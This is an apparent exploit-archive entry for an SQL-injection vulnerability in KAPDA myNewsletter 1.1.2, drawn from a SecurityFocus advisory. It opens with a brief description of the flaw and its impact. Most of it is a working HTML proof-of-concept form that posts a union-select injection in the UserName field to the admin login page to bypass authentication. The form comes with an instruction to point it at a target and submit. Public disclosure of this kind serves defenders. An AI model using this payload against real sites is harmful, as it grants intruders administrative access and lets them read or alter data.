15 lines
No EOL
1 KiB
HTML
15 lines
No EOL
1 KiB
HTML
source: https://www.securityfocus.com/bid/18287/info
|
|
|
|
myNewsletter is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
|
|
|
|
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
|
|
|
|
<html><center><h1>KAPDA myNewsletter 1.1.2 Login bypass PoC</h1><br>change action in source and then submit
|
|
</center><form name="adminLogin" method="post" action="http://www.site.com/newsletter/adminLogin.asp">
|
|
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
|
|
<input type="hidden" name="Password" value="1">
|
|
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
|
|
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
|
|
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
|
|
</form>
|
|
</html> |